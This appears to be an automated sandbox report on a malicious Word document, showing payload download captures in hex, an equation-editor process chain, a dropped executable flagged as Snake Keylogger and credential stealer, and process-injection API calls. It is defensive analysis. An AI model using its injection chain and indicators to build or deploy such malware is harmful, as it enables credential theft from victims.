Nov 29, 2022 16:50:19.358020067 CET	3	IN	Data Raw: 20 06 01 00 00 73 25 00 00 0a 6f 26 00 00 0a 00 02 7b 02 00 00 04 72 0f 00 00 70 6f 27 00 00 0a 00 02 7b 02 00 00 04 20 ff 00 00 00 1f 3c 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 02 00 00 04 1f 0f 6f 2a 00 00 0a 00 02 7b 02 00 00 04 72 35 00 00 70 Data Ascii: s%o&{rpo'{ <s(o){o*{r5po+{o,{s-o.{(o{o{o {rp"@As!o"{(#o${ is%o&{
Nov 29, 2022 16:50:19.358045101 CET	4	IN	Data Raw: 2a 13 30 01 00 16 00 00 00 08 00 00 11 00 73 01 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 0a 00 2a 00 00 00 13 30 02 00 2b 00 00 00 05 00 00 11 00 03 2c 0b 02 7b 07 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 07 00 00 04 6f 17 Data Ascii: 0so(0+,{+,{o(0(ssG}sG}sG}sH}sH}sH}s}s}({oI{(J
Nov 29, 2022 16:50:19.358069897 CET	5	IN	Data Raw: 00 0a 02 7b 0f 00 00 04 6f 36 00 00 0a 00 02 28 35 00 00 0a 02 7b 0e 00 00 04 6f 36 00 00 0a 00 02 28 35 00 00 0a 02 7b 0d 00 00 04 6f 36 00 00 0a 00 02 28 35 00 00 0a 02 7b 0c 00 00 04 6f 36 00 00 0a 00 02 28 35 00 00 0a 02 7b 0b 00 00 04 6f 36 Data Ascii: {o6(5{o6(5{o6(5{o6(5{o6(5{o6(5{o6(5{o6rp"@As!o"sM(Nrp('(9(:rpo+s-(O(
Nov 29, 2022 16:50:19.358093977 CET	7	IN	Data Raw: 6f 2b 00 00 0a 00 02 7b 14 00 00 04 17 6f 58 00 00 0a 00 02 7b 14 00 00 04 20 a6 01 00 00 20 dc 00 00 00 73 25 00 00 0a 6f 26 00 00 0a 00 02 7b 14 00 00 04 72 f3 04 00 70 6f 27 00 00 0a 00 02 7b 14 00 00 04 1f 33 1f 24 73 28 00 00 0a 6f 29 00 00 Data Ascii: o+{oX{ s%o&{rpo'{3$s(o){o{oX{ R s%o&{r!po'{3$s(o){)o*{oI{(Jo{ s%o&
Nov 29, 2022 16:50:19.358160019 CET	8	IN	Data Raw: 00 73 25 00 00 0a 6f 26 00 00 0a 00 02 7b 1e 00 00 04 72 47 06 00 70 6f 27 00 00 0a 00 02 7b 1e 00 00 04 20 fd 00 00 00 1f 23 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 1e 00 00 04 1f 2f 6f 2a 00 00 0a 00 02 7b 1f 00 00 04 20 19 01 00 00 20 44 01 00 Data Ascii: s%o&{rGpo'{ #s(o){/o{ Ds%o&{repo'{ #s(o){0o{ (/o{ o{ rp"@As!o"{ (Ko${ s%o&
Nov 29, 2022 16:50:19.358185053 CET	9	IN	Data Raw: 01 16 0a 06 39 dd 01 00 00 00 02 7b 22 00 00 04 6f 3f 00 00 0a 00 72 db 06 00 70 02 7b 22 00 00 04 73 40 00 00 0a 0b 07 1a 6f 53 00 00 0a 00 07 6f 42 00 00 0a 72 eb 06 00 70 02 7b 2d 00 00 04 6f 3d 00 00 0a 73 41 00 00 0a 6f 43 00 00 0a 26 07 6f Data Ascii: 9{"o?rp{"s@oSoBrp{-o=sAoC&oBrp{'o=sAoC&oBrp{&o=sAoC&oBrp{%o=sAoC&oBr-p{.o=sAoC&rIp{"s@o`+E{-
Nov 29, 2022 16:50:19.358222008 CET	11	IN	Data Raw: 16 73 21 00 00 0a 6f 22 00 00 0a 00 02 7b 26 00 00 04 20 2f 01 00 00 20 e4 00 00 00 73 25 00 00 0a 6f 26 00 00 0a 00 02 7b 26 00 00 04 19 18 19 18 73 4d 00 00 0a 6f 5e 00 00 0a 00 02 7b 26 00 00 04 72 49 09 00 70 6f 27 00 00 0a 00 02 7b 26 00 00 Data Ascii: s!o"{& / s%o&{&sMo^{&rIpo'{& s(o){&'o{'oe{'rp"@As!o"{' / s%o&{'sMo^{'rqpo'{'og{'
Nov 29, 2022 16:50:19.358247042 CET	12	IN	Data Raw: 04 17 6f 58 00 00 0a 00 02 7b 2e 00 00 04 6f 51 00 00 0a 19 8d 13 00 00 01 25 16 72 b9 0a 00 70 a2 25 17 72 c3 0a 00 70 a2 25 18 72 db 0a 00 70 a2 6f 69 00 00 0a 00 02 7b 2e 00 00 04 20 2f 01 00 00 20 40 01 00 00 73 25 00 00 0a 6f 26 00 00 0a 00 Data Ascii: oX{.oQ%rp%rp%rpoi{. / @s%o&{.rpo'{. s(o){.+o*{/oe{/rp"@As!o"{/ / s%o&{/sMo^{/rpo'
Nov 29, 2022 16:50:19.358272076 CET	13	IN	Data Raw: 00 00 00 05 00 00 11 00 03 2c 0b 02 7b 32 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 32 00 00 04 6f 17 00 00 0a 00 00 02 03 28 18 00 00 0a 00 2a 00 13 30 06 00 7f 04 00 00 06 00 00 11 00 d0 06 00 00 02 28 19 00 00 0a 73 1a 00 00 0a 0a 02 73 Data Ascii: ,{2+,{2o(0(ss}3s}4s}5s}6s}7({3o {3 us%o&{3rpo'{3t.s(o){3o{3rpo+
Nov 29, 2022 16:50:19.386260033 CET	15	IN	Data Raw: 04 6f 3d 00 00 0a 72 3d 0c 00 70 28 62 00 00 0a 0a 06 2c 0b 00 02 28 29 00 00 06 00 00 2b 46 02 7b 3d 00 00 04 6f 3d 00 00 0a 72 47 0c 00 70 28 62 00 00 0a 0b 07 2c 0b 00 02 28 2a 00 00 06 00 00 2b 22 02 7b 3d 00 00 04 6f 3d 00 00 0a 72 5d 0c 00 Data Ascii: o=r=p(b,()+F{=o=rGp(b,(+"{=o=r]p(b,(+0h{8o?{=o=r=p(b,0r{p{>o=rp(U{8s@}98{=o=rGp(b,-rp{>o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	193.122.6.168	80	C:\Users\user\AppData\Roaming\rinzearec84736.exe

Timestamp	kBytes transferred	Direction	Data
Nov 29, 2022 16:50:27.785404921 CET	896	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 29, 2022 16:50:27.807564974 CET	896	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 15:50:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.143.49</body></html>
Nov 29, 2022 16:50:28.032141924 CET	896	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 15:50:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.143.49</body></html>

Target ID:	0
Start time:	16:50:15
Start date:	29/11/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fe90000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	16:50:16
Start date:	29/11/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	16:50:20
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\rinzearec84736.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rinzearec84736.exe
Imagebase:	0x9c0000
File size:	842240 bytes
MD5 hash:	D248194D56895A1FAE8914E81CD9B36A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.922046499.0000000002241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	16:50:25
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\rinzearec84736.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rinzearec84736.exe
Imagebase:	0x9c0000
File size:	842240 bytes
MD5 hash:	D248194D56895A1FAE8914E81CD9B36A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	7
Start time:	16:50:40
Start date:	29/11/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 001D1BE8 Relevance: 1.4, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

O2, xrefs: 001D1BF0

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID: O2
API String ID: 0-4277080245
Opcode ID: 7bb7b4b99f78d24a08ed73adbc07401330bae52e9e53b72a5480743f99c2b792
Instruction ID: 98bbeb23d4e1fabee4dcf39501e48380bf92d1515981e985929a5c33617b820c
Opcode Fuzzy Hash: 7bb7b4b99f78d24a08ed73adbc07401330bae52e9e53b72a5480743f99c2b792
Instruction Fuzzy Hash: 1B51A171E052199FDF09DFEAC8816EEFBF2BF89300F14842AD419AB264DB745946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D008C Relevance: .5, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f2c5f858d80fdff0896a1b4dc6ddf94dee12a19d1c8d45aad6ad92e3fadc69
Instruction ID: 0e2673f35ed908321bfb4ca0f94b5698e9766bb0239fa0cc0123ae7f60144529
Opcode Fuzzy Hash: 33f2c5f858d80fdff0896a1b4dc6ddf94dee12a19d1c8d45aad6ad92e3fadc69
Instruction Fuzzy Hash: A432C334A00218CFDB14DFA4C995B9DB7B2FF89304F2185A9E509AB365DB34AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D0519 Relevance: .5, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ede6b7119b410d7d028caeab107af503101392903f113fbe5cee9e0f0526921
Instruction ID: 6a067f61bd9deb315f32353fa40abb6ccabd0da4bcbb66c26cff843c5a7bd251
Opcode Fuzzy Hash: 8ede6b7119b410d7d028caeab107af503101392903f113fbe5cee9e0f0526921
Instruction Fuzzy Hash: C232D334A00318CFDB14DFA4C995A9DB7B2FF89304F2185A9E509AB365DB34AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D1D96 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f85954a98c338016574732f9f23f8a60a55f5f42d294ff9ec101e910a0c4209
Instruction ID: 22532a7e29c47911184426cae173d597d268dc55196c3001c8e25966ee8106d0
Opcode Fuzzy Hash: 5f85954a98c338016574732f9f23f8a60a55f5f42d294ff9ec101e910a0c4209
Instruction Fuzzy Hash: A6A1DFB4D04658AFDB08CFE9C4846EDFBF2BB89304F24812AD419AB355D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D1040 Relevance: .2, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a761aee0a4785ca17b23b46582922f7824b320840e9a55e3552c80f9b8b851
Instruction ID: 6b404f22746aacf579dc2f7006dfb691215832d3aef7621dd1f96b7bd33df030
Opcode Fuzzy Hash: 82a761aee0a4785ca17b23b46582922f7824b320840e9a55e3552c80f9b8b851
Instruction Fuzzy Hash: 8281B274E00218DFDB18DFA9D9845EEBBB2FF89300F20852AD915AB754DB359941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001DCB58 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DCE1F

Strings

Q-n, xrefs: 001DCBC2
Q-n, xrefs: 001DCB93

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: CreateProcess
String ID: Q-n$Q-n
API String ID: 963392458-2491562359
Opcode ID: d772c50510a4b98749fef2ac91ca746d0c51a8748579bacc276cc13b09f48430
Instruction ID: 0dbdc66eac19f28c1310768e3979f91030e8b17a57fa209f5b422d3430bcf262
Opcode Fuzzy Hash: d772c50510a4b98749fef2ac91ca746d0c51a8748579bacc276cc13b09f48430
Instruction Fuzzy Hash: 98C11670D0025A8FDB20DFA4C841BEDBBB1BF49304F1495AAE959B7240DB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001DC730 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DC803

Strings

Q-n, xrefs: 001DC752

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: Q-n
API String ID: 3559483778-4097762733
Opcode ID: 619c87a5013b7b70c03719aa8374936d132dde0c5f708b40782155e7c956769f
Instruction ID: 2cac2e47d8c08ecc21f0c336e920af5ce438e86d078a1b0a40a9e29651d7c272
Opcode Fuzzy Hash: 619c87a5013b7b70c03719aa8374936d132dde0c5f708b40782155e7c956769f
Instruction Fuzzy Hash: DB41A9B4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D734AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001DC8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DC972

Strings

Q-n, xrefs: 001DC8E2

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: MemoryProcessRead
String ID: Q-n
API String ID: 1726664587-4097762733
Opcode ID: 8f157b0ec07659edd8e58925015fd076800f474e589c48e9c6c99b9b64835797
Instruction ID: 5e1e3fcf4988f150c7d59d6566db890eb8ac331ce519908fe22e7bc49808acf4
Opcode Fuzzy Hash: 8f157b0ec07659edd8e58925015fd076800f474e589c48e9c6c99b9b64835797
Instruction Fuzzy Hash: D841B8B5D042589FCF10CFA9D884AEEFBB1BF49314F20A42AE814B7240D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001DC5D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DC682

Strings

Q-n, xrefs: 001DC5F2

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: AllocVirtual
String ID: Q-n
API String ID: 4275171209-4097762733
Opcode ID: 22d3d3a46241d9d0b7f409c279638da82c839f93a9430ccec62d4f99599e93af
Instruction ID: e5b04284d590faabe5991ce5ca91a87ee43913679f7dffde1f2790d2a131fc5a
Opcode Fuzzy Hash: 22d3d3a46241d9d0b7f409c279638da82c839f93a9430ccec62d4f99599e93af
Instruction Fuzzy Hash: C04199B4D042589FCF10CFA9D884A9EBBB1BF49314F20A42AE814B7310D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001DC3E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001DC497

Strings

Q-n, xrefs: 001DC407

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: ContextThreadWow64
String ID: Q-n
API String ID: 983334009-4097762733
Opcode ID: 74cde69feb5c8f9b593527b6646974de09163c7cc6d91dbcfa332a13d422cd29
Instruction ID: dfca3a6bda3d5de9bbd1ac3f3bfbbee0030de088ba202cc879f0f16b3ff8412d
Opcode Fuzzy Hash: 74cde69feb5c8f9b593527b6646974de09163c7cc6d91dbcfa332a13d422cd29
Instruction Fuzzy Hash: 3F41ADB4D002599FCB14CFA9D884AEEBBF1AF49314F24842AE418B7340D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001DC2C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 001DC346

Strings

Q-n, xrefs: 001DC2E2

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID: ResumeThread
String ID: Q-n
API String ID: 947044025-4097762733
Opcode ID: bb7812438792538240217b35a4a4055ff191812be63d9b32879e1bdc11fd60a2
Instruction ID: fab84a608ae2f162f9d78d018748caf5f43fed0da6bb636a44b709f0f4ba705c
Opcode Fuzzy Hash: bb7812438792538240217b35a4a4055ff191812be63d9b32879e1bdc11fd60a2
Instruction Fuzzy Hash: 4D31B9B4D00218AFCF14CFA9D884A9EFBB4BF49314F24942AE814B7300DB35A901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04924E6D Relevance: 1.3, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 04924EC5

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID: Y
API String ID: 0-3233089245
Opcode ID: 4440a846371d92546a81b86507d7b09e6ea18688f0c2e925044d73006b5f97f2
Instruction ID: 855adc6be76849f69a68d0a42b0f36290f3a7120f78f50589a5e965d2369b101
Opcode Fuzzy Hash: 4440a846371d92546a81b86507d7b09e6ea18688f0c2e925044d73006b5f97f2
Instruction Fuzzy Hash: 3DF0FF74D00A688FCB64DF58DD9479ABBB1AB48302F5041E9940DA7250DB351E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 049264F8 Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14902e22edb173c0ef8af7c42872bd67ce93ae89a4e0230a3f6d7964185af1fb
Instruction ID: a6fd5600b346eba52c24ac42601cfbfc63c9c1e20250996bf167f62bbbe735d9
Opcode Fuzzy Hash: 14902e22edb173c0ef8af7c42872bd67ce93ae89a4e0230a3f6d7964185af1fb
Instruction Fuzzy Hash: E6310274E012199FDB05DFA9D840AEEBBB2FF88300F11802AE405A7360EB355912CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921110215.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc1c5025cb476e0a2645dbcb2284a8b16a0ababa8a25319b600c23a6595ae27f
Instruction ID: 980b772baf2f3cc24605bff50702aebacc4470cdfd80f0da1ed47b084d9c4c70
Opcode Fuzzy Hash: dc1c5025cb476e0a2645dbcb2284a8b16a0ababa8a25319b600c23a6595ae27f
Instruction Fuzzy Hash: 542101B1604244EFDB15DF24F9C0B26BBA5FB88318F30C6A9E8094B246C736D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921110215.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d2fbf08af33a0000e842083172b078400e4758dfdeadfbfcafc492c395a3de
Instruction ID: 9002dcc55a2ed4bfe8a1d73892350aec71acb51381f6f15738d8c310be7aa925
Opcode Fuzzy Hash: e9d2fbf08af33a0000e842083172b078400e4758dfdeadfbfcafc492c395a3de
Instruction Fuzzy Hash: 0F21F575604244EFDB18DF24F884B26BB65EB84B14F30C569F8094B246C736D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921110215.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 484a7326c44e057dea4748fd5f5cc526ccc8a85764bde3c03e2d76e475dbba17
Instruction ID: 9ebebff8e49d0a90acf3dc36bacd093ee048e116ad246abaecf1930d20152d51
Opcode Fuzzy Hash: 484a7326c44e057dea4748fd5f5cc526ccc8a85764bde3c03e2d76e475dbba17
Instruction Fuzzy Hash: 12214F755083809FCB06CF24E994B15BFB1EB46714F28C5DAD8498B266C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921110215.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e9a580ff7b0a41f382a03b0e211de92538033aa3300e941bae2c25bb2be9d1
Instruction ID: a533102262401695ab240d07b6d2c5808199552370fa92f2e2caee18fd5c5808
Opcode Fuzzy Hash: 45e9a580ff7b0a41f382a03b0e211de92538033aa3300e941bae2c25bb2be9d1
Instruction Fuzzy Hash: 82119D75504280DFDB12CF14E5C4B16FFA1FB84314F24C6AED8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921080505.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9146d1d0f836734665852b42de2945d8e4fe3e172ebf7182f31d061afacfb4ab
Instruction ID: 3227796fa5e9063290f3ea66c9c6ebf832f57dbcdf1af8ada3109250680cc6c9
Opcode Fuzzy Hash: 9146d1d0f836734665852b42de2945d8e4fe3e172ebf7182f31d061afacfb4ab
Instruction Fuzzy Hash: CE0184310087649ADB509B25FC84B67BB98DF55725F28C45AED045B286C378D854C6B1

Uniqueness

